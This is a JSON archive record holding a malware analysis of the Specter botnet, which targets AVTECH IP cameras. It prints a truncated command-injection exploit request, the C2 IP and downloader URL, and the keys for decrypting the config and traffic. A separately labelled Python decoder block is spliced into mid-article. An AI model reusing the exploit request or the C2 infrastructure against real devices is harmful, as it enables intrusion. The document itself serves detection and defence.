{
	"id": "6225988d-3ba0-475e-b8db-7c6ef029f298",
	"created_at": "2026-04-06T00:21:27.961458Z",
	"updated_at": "2026-04-10T03:30:57.076879Z",
	"deleted_at": null,
	"sha1_hash": "32503b0050a8e3b1756977e93e2e5bc3b741126c",
	"title": "Ghost in action: the Specter botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 823396,
	"plain_text": "Ghost in action: the Specter botnet\r\nBy Alex.Turing\r\nPublished: 2020-09-25 · Archived: 2026-04-05 12:50:12 UTC\r\nBackground\r\nOn August 20, 2020, 360Netlab Threat Detect System captured a suspicious ELF file\r\n( 22523419f0404d628d02876e69458fbe.css )with 0 VT detection.\r\nWhen we took a close look, we see a new botnet that targets AVTECH IP Camera / NVR / DVR devices , and it has\r\nflexible configuration, highly modular / plugin, and uses TLS, ChaCha20, Lz4 to encrypt and compress network\r\ntraffic.\r\nThe ELF we captured is Dropper, it releases a loader, and the loader will send encrypted traffic requests various\r\nPlugins from C2 to perform different functions. The sample build path is /build/arm-specter-linux-uclibcgnueabi , that is why we named it Specter.\r\nAt present, Specter has a lot of unprofessional aspects . For example, it releases two libraries required by\r\nruntime while releasing Loader, but they are all dynamically linked.We also noticed that Plugin does not expand\r\nand load directly in memory.The vulnerability being targeted is also quite old, a 5 years old on. On the other hand,\r\nthis botnet has a good layered design, complex network communication and some other characteristics，which is\r\nobviously a work of professional. Professional aspects come with unprofessional aspects , this contradiction\r\nmakes us speculate that Specter is in the test development stage. We will see how it goes in the future.\r\nOverview\r\nSpecter is a remote control Trojan (RAT) for the Linux platform.\r\nIt consists of 3 parts, Dropper, Loader, and Plugin. The main function is determined by Loader\u0026Plugin. 
The main functions of Specter are:\r\nFile management\r\nDownload and upload management\r\nShell service\r\nSOCKS5 proxy\r\nReporting device information\r\nExecuting scripts issued by the C2\r\nDownloading and executing executable files delivered by the C2\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 1 of 15\n\nThe basic process is shown in the figure below:\r\nPropagation\r\nSpecter spreads its Dropper samples through a vulnerability in AVTECH IP Camera / NVR / DVR devices. The payload being used is as follows (request line truncated as captured):\r\nGET /cgi-bin/nobody/Search.cgi?action=cgi_query\u0026ip=google.com\u0026port=80\u0026queryb64str=Lw==\u0026username=admin%20;XmlAp%\r\nHost: {}:4443\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0\r\nAccept-Language: en-US,en;q=0.8,zh-CN;q=0.7,zh;q=0.5,zh-TW;q=0.3,zh-HK;q=0.2\r\nContent-Type: text/plain; charset=utf-8\r\nSample analysis\r\nSpecter's infection process can be divided into 4 stages:\r\nStage 0: Preliminary stage, spread through the vulnerability and implant the Dropper on the device\r\nStage 1: Release stage, the Dropper releases the Loader\r\nStage 2: Loading stage, the Loader loads Plugins\r\nStage 3: Plugins execute the instructions issued by the C2\r\nStage 1: Release stage, Specter_Dropper analysis\r\nThe main function of the Dropper is to detect the operating environment, decrypt the Loader, fill in the Config, and finally release and start the Loader.\r\nMD5: a8400c378950084fc8ab80b8bb4e5b18\r\nELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, stripped\r\nPacker: No\r\n1.1 Decrypt Loader\r\nDecryption algorithm: XOR every byte with 0x79, then negate it.\r\nAlong with the Loader, the runtime libraries libc.so.0 and ld-uClibc.so.1 are also decrypted. Currently these two libraries contain no malicious functions, but we speculate that future versions will hijack some functions of these two libraries to hide Specter from the file, process and network perspectives.\r\n1.2 Configure Config\r\nThe Dropper looks for the position marker SpctCF in the Loader sample and writes the Config immediately after it. The before/after comparison is as follows:\r\n1.3 Release and execute Loader\r\nThe Loader is written to /tmp/runtimes/hw_ex_watchdog and run, after which the Dropper deletes itself to clean up its traces.\r\nStage 2: Loading stage, Specter_Loader analysis\r\nThe main function of the Loader is to decrypt the Config, obtain the C2 from it, establish encrypted communication with the C2 and execute the instructions it issues. If there is no Plugin to handle a given instruction, the Loader requests the required Plugin from the C2.\r\nMD5: 470a092abd67e25463425b611088b1db\r\nELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), stripped\r\nPacker: No\r\n2.1 Decrypt Config\r\nThe Config holds the C2, the mutex name, a nonce and other information. It is encrypted with ChaCha20, where the key is CsFg34HbrJsAx6hjBmxDd7A2Wj0Cz9s\\x00 (31 characters plus a terminating NUL, 32 bytes in total) and the number of rounds is 15, a non-standard variant that stock ChaCha20 implementations will not decrypt.\r\nThe detailed Config structure is shown below:\r\nTaking the Config in the above figure as an example, the 12-byte nonce required for decryption is:\r\nc1 f5 9e 20 7a 35 9d 25 ed 77 bb 70\r\nThe ciphertext is:\r\n94 69 CA D5 A0 0F 73 A9 BB 05 71 B2 31 1D EF 06\r\n1A 2A BC 94 3A A7 4B 72 3A 0C BC 8E BF 57 1E 69\r\n88 1B A1 7D FB 79 6C 26 A9 95 EB B1 E9 53 A9 2B\r\n33 3D A7 F6 D2 07 E4 64 FD 70 81 C2 83 C2 A1 5F\r\n13 EB 3F 9C 6F CD 03 50 84 C5 5C 9C 31 B1 9F CF\r\n06 4B 5F 12 E9 C3 39 C3 EE 07 C5 CE E2 C2 58 FA\r\n6C AA 6D 9B 00 C2 37 3E C2 98 52 47 D4 4D E7\r\nAfter decryption we get the following plaintext, in which the mutex is fb4mi5a and the C2 is 107.182.186.195 on port 443. The address and port are stored as length-prefixed strings (0f 00 00 00 followed by 107.182.186.195, then 03 00 00 00 followed by 443):\r\n00000000 f4 36 ce 57 b0 46 d2 96 27 1c a6 88 fe 57 e2 22 |ô6ÎW°FÒ.'.¦.þWâ\"|\r\n00000010 52 34 19 f0 40 4d 62 8d 02 87 6e 69 45 8f be 6a |R4.ð@Mb...niE.¾j|\r\n00000020 66 62 34 6d 69 35 61 00 01 00 00 00 0f 00 00 00 |fb4mi5a.........|\r\n00000030 31 30 37 2e 31 38 32 2e 31 38 36 2e 31 39 35 03 |107.182.186.195.|\r\n00000040 00 00 00 34 34 33 01 00 00 00 01 00 00 00 01 00 |...443..........|\r\n00000050 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 |................|\r\n00000060 00 00 01 00 00 00 1e 00 5a 00 14 00 3c 00 00 |........Z...\u003c..|\r\n2.2 Establish communication with C2\r\nThe communication process can be divided into 4 stages and uses TLS, ChaCha20 encryption and lz4 compression to protect the data. The first stage establishes a TLS connection, the second is mutual authentication, the third is the Loader reporting device information, and the fourth is executing the instructions issued by the C2.\r\nTLS communication\r\nIn order to analyze the network traffic we performed a man-in-the-middle attack on the TLS connection; the result is shown below. Specter's network packets have a fixed format.\r\nPackets can be divided into four parts, the detailed structure is shown below:\r\nEncrypted Payload_info stores the payload checksum, lengths, ID and other metadata.\r\n[Encrypted?]Compressed Payload is the payload itself. It is only compressed during the key exchange stage, while in all other stages it is both compressed and encrypted.\r\nLet's take a look at the above figure, the packet that the Bot sends to the C2 for key exchange.\r\nThe encryption algorithm used in the first part ( Encrypted Payload_info ) is:\r\nChaCha20\r\nKey: 36 30 30 64 65 33 31 39 61 32 66 38 31 39 62 34\r\n61 38 35 31 64 32 33 66 63 34 62 33 33 33 33 65\r\n(the ASCII string 600de319a2f819b4a851d23fc4b3333e)\r\nNonce: E7 66 29 FB 10 98 F6 5A 80 80 FF 58\r\nThe ciphertext is:\r\n0F 41 01 FD 8B 75 6C A2 20 31 DC 35 70 D9 4D 3B 8E 53 4D E9\r\nAfter decryption:\r\nC9 3E 00 00 00 00 00 00 00 00 01 00 22 00 00 00 20 00 00 00\r\n3EC9 ---- CRC16 of the payload\r\n0001 ---- Cmd Id\r\n00000022 ---- Compressed payload length (34 bytes)\r\n00000020 ---- Decompressed payload length (32 bytes)\r\nThe value of Cmd Id is 1, indicating the key exchange stage, so the [Encrypted?]Compressed Payload is simply decompressed to get the key the Bot sends to the C2:\r\n01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10\r\n11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20\r\nAuthentication\r\nThe protocol's authentication process can be divided into two stages: the first is the key exchange, the second is mutual identity verification.\r\nFollowing the packet decryption process introduced above, we get:\r\nThe key sent by the Bot to the C2 is:\r\n01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10\r\n11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20\r\nThe key sent by the C2 to the Bot is:\r\n19 F8 7C 62 7B 8D A2 B3 59 FD AE 25 4C 18 F7 33\r\n96 B5 D9 F5 EC FF C2 07 C3 7C 87 53 AE 60 99 2C\r\nIn the key exchange phase the payload is only compressed, not encrypted; after the keys are exchanged, Bot and C2 compress and encrypt the payload with each other's key, so the later packets can be decrypted with the two keys above. Note that the key the Bot sends is the byte sequence 01 .. 20 rather than random bytes, and both keys travel in the clear inside the TLS session, so this inner layer adds no secrecy against anyone who can intercept the TLS connection, as we did here.\r\nThe authentication information sent by the Bot to the C2 is:\r\n00000000: 44 48 6E 37-34 73 64 50-4F 71 6E 53-64 32 35 39 DHn74sdPOqnSd259\r\nThe authentication information sent by the C2 to the Bot is:\r\n00000000: 6C 30 53 4F-38 68 46 55-78 62 56 73-64 74 51 34 l0SO8hFUxbVsdtQ4\r\nThis is consistent with the implementation we saw in the sample:\r\n2.3 Report device information, such as MAC/IP address, system type, etc.\r\n2.4 Execute the start-Plugin command issued by the C2\r\nSpecter implements a very flexible plugin management and communication mechanism; each plugin must implement the following 4 methods (shown in the figure):\r\nIf the corresponding Plugin is not present, it is requested from the C2 and finally loaded dynamically into the Loader's Plugin Slot.\r\nStage 3: Specter_Plugin analysis\r\nWhen the bot receives a Plugin issued by the C2, it cannot be used directly, because Plugins are encrypted and can only be loaded into the Plugin Slot after decryption.\r\nDecryption algorithm: XOR every byte with 0x7f, then negate it.\r\nHere are some plugins we captured:\r\nShell plugin\r\nPlugin id: 1\r\nc7bf33d159597f55dce31b33a58d52de\r\nELF 32-bit LSB shared object, ARM, version 1 (SYSV), not stripped\r\nThe main function of the Shell plugin is to provide a shell service.\r\nFile plugin\r\nPlugin id: 2\r\ne67db6449c18b2e552786df7718a33c8\r\nELF 32-bit LSB shared object, ARM, version 1 (SYSV), not stripped\r\nThe main function of the File plugin is file management. 
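The three decoding steps above (Stage 1: XOR 0x79 then negate; section 2.2: the ChaCha20-encrypted Payload_info header; Stage 3: XOR 0x7f then negate), worked as one added example. This is not code from the 360Netlab post or from Specter. The PKT_* and CONFIG_* constants are the key, nonce, ciphertext and plaintext values the post prints; any ELF blob fed to carve_elf is constructed input; and the round convention for the 15-round ChaCha20 is an assumption, since the post gives the count but not the loop, which is why the example searches for the (rounds, counter) pair that reproduces the post's plaintext instead of asserting one.

```python
# Added example (not code from the 360Netlab post or from Specter): helpers for
# the decoding steps the write-up describes. Anything not printed in the post is
# marked as an assumption or as constructed input.
import struct

MASK = 0xffffffff
ELF_MAGIC = bytes.fromhex('7f454c46')

def xor_negate(data, key):
    # Dropper payloads use key 0x79 and plugin blobs 0x7f (per the post). NOT is
    # XOR with 0xff, so the transform is XOR with (key ^ 0xff) and is its own
    # inverse: the same call encodes and decodes.
    return bytes(b ^ key ^ 0xff for b in data)

def carve_elf(blob, key):
    # Decode a blob and return (plaintext, offsets of every ELF header in it).
    # A real dropper should yield the Loader plus libc.so.0 and ld-uClibc.so.1.
    plain = xor_negate(blob, key)
    offsets, i = [], plain.find(ELF_MAGIC)
    while i >= 0:
        offsets.append(i)
        i = plain.find(ELF_MAGIC, i + 1)
    return plain, offsets

COLUMNS = ((0, 4, 8, 12), (1, 5, 9, 13), (2, 6, 10, 14), (3, 7, 11, 15))
DIAGONALS = ((0, 5, 10, 15), (1, 6, 11, 12), (2, 7, 8, 13), (3, 4, 9, 14))

def _rotl(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK

def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 7)

def chacha_block(key, nonce, counter, rounds):
    # RFC 8439 block function (32-byte key, 12-byte nonce, 32-bit counter) with
    # the round count as a parameter; rounds=20 is stock ChaCha20.
    # ASSUMPTION: the post says 'rounds = 15' but not how the loop is written.
    # Here a count means single rounds: column rounds on even steps, diagonal
    # rounds on odd steps, so 15 ends on a column round.
    init = list(struct.unpack('<4I', b'expand 32-byte k'))
    init += struct.unpack('<8I', key) + (counter,) + struct.unpack('<3I', nonce)
    work = init[:]
    for r in range(rounds):
        for a, b, c, d in (COLUMNS if r % 2 == 0 else DIAGONALS):
            _quarter_round(work, a, b, c, d)
    return struct.pack('<16I', *[(x + y) & MASK for x, y in zip(init, work)])

def chacha_xor(key, nonce, data, rounds=20, counter=0):
    # Encrypt/decrypt (same operation) with the keystream from chacha_block.
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha_block(key, nonce, counter + off // 64, rounds)
        out += bytes(x ^ y for x, y in zip(data[off:off + 64], ks))
    return bytes(out)

def find_chacha_params(key, nonce, ciphertext, plaintext, max_rounds=20):
    # The post prints key, nonce, ciphertext and plaintext for one packet but not
    # the loop convention or the initial counter. Search the plausible
    # (rounds, counter) pairs; returns the first match or None.
    for counter in (0, 1):
        for rounds in range(1, max_rounds + 1):
            if chacha_xor(key, nonce, ciphertext, rounds, counter) == plaintext:
                return rounds, counter
    return None

def parse_payload_info(header):
    # Decrypted 20-byte Payload_info: CRC16 of the payload, 8 bytes the post does
    # not label (kept opaque), command id, compressed and decompressed lengths.
    # ASSUMPTION: little-endian, which matches the values the post annotates.
    crc, opaque, cmd, clen, dlen = struct.unpack('<H8sHII', header)
    return {'crc16': crc, 'opaque': opaque, 'cmd_id': cmd,
            'compressed_len': clen, 'decompressed_len': dlen}

# Values copied from the post: the Bot -> C2 key-exchange packet header and the
# Config key/nonce from section 2.1.
PKT_KEY = b'600de319a2f819b4a851d23fc4b3333e'
PKT_NONCE = bytes.fromhex('e76629fb1098f65a8080ff58')
PKT_HEADER_CT = bytes.fromhex('0f4101fd8b756ca22031dc3570d94d3b8e534de9')
PKT_HEADER_PT = bytes.fromhex('c93e000000000000000001002200000020000000')
CONFIG_KEY = b'CsFg34HbrJsAx6hjBmxDd7A2Wj0Cz9s' + bytes(1)
CONFIG_NONCE = bytes.fromhex('c1f59e207a359d25ed77bb70')

# Which convention reproduces the post's decrypted header? None means the
# sample's loop differs from the single-round assumption above and the search
# has to be widened (double rounds, other counters) before touching the Config.
PKT_PARAMS = find_chacha_params(PKT_KEY, PKT_NONCE, PKT_HEADER_CT, PKT_HEADER_PT)
```

If PKT_PARAMS comes back None, the sample's loop counts rounds differently (for instance as double rounds) or starts the counter elsewhere; widen the search instead of trusting the assumed convention. Once the convention is known, chacha_xor with CONFIG_KEY, CONFIG_NONCE and rounds=15 is the starting point for decrypting the Config of section 2.1, whose C2 and port are stored as length-prefixed strings in the plaintext shown there.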
The File plugin, in addition to supporting read, write, delete and search operations on directories, can also download and upload files from a designated server.\r\nSocket Plugin\r\nPlugin id: 3\r\n45c5e7bcb9987356b53fd9a78543dcda\r\nELF 32-bit LSB shared object, ARM, version 1 (SYSV), not stripped\r\nThe main function of the Socket plugin is to start a SOCKS5 proxy.\r\nSSF Plugin\r\nPlugin id: 5\r\nda0f9a21ae7ee3d15794946ca74a07e3\r\nELF 32-bit LSB shared object, ARM, version 1 (SYSV), stripped\r\nThe main function of the SSF plugin is to download an executable file from a specified server to the local file /tmp/runtimes/httpd_log_output and then execute it.\r\nSuggestions\r\nWe recommend that readers monitor and block the Specter related IPs, URLs and samples. The dropped file paths /tmp/runtimes/hw_ex_watchdog and /tmp/runtimes/httpd_log_output, and requests to /cgi-bin/nobody/Search.cgi carrying a ';' in the username parameter, are useful host and web-log indicators as well.\r\nContact us\r\nReaders are always welcome to reach us on Twitter, WeChat 360Netlab or by email to netlab at 360 dot cn.\r\nIoC\r\nC2\r\n107.182.186.195:443 ASN25820|IT7_Networks_Inc United_States|California|Los_Angeles\r\nSample MD5\r\n04c7ef9e4197985d31e5d601a9161c5e\r\n052b6fce24a800259289e2f06163db57\r\n065d942effb6010bb48f7403d3ad442b\r\n0d0bf23412bd34c82ab28e67278519bf\r\n2b89fd69d128c8a28425c512670e531a\r\n2ed27722e095b1c870fdb10e4990db0f\r\n42d341d0b76869abc2231c70d0f0ecc9\r\n5e03c99153ed59546bf60c9f896a30f1\r\n7377eedb6512743858d52da3cc028a33\r\n7c59ddc06da158afc8b514a9a81ffd36\r\na5ded8b31b17c88302882cccc35cc28f\r\na8400c378950084fc8ab80b8bb4e5b18\r\na99563e6711990b9b3f542ae146bd01c\r\nacfa5f547b69bde0bf3f343429594b99\r\nb79639e2b5d10f92ea44721e155fc09b\r\nb9ac3d23faba205f74ebd932d8e370d3\r\nc2126977f9f482f290154ea21719330f\r\nc33b585a0dfa5fdb70d27a17ace6ba1f\r\nc51fc1656aa857bb7226e2df969aa72d\r\ncc1b11c6ac6e5bebc4c0e7502b4e1fcd\r\ncc27d6141f8c66e520122e8f2292a940\r\neda6d2b0837b5e78ae1b0b50f85e3321\r\nDownloader\r\nhttp://45.76.70.163:80/style/22523419f0404d628d02876e69458fbe.css\r\nSource: https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/"
	],
	"report_names": [
		"ghost-in-action-the-specter-botnet"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434887,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/32503b0050a8e3b1756977e93e2e5bc3b741126c.pdf",
		"text": "https://archive.orkl.eu/32503b0050a8e3b1756977e93e2e5bc3b741126c.txt",
		"img": "https://archive.orkl.eu/32503b0050a8e3b1756977e93e2e5bc3b741126c.jpg"
	}
}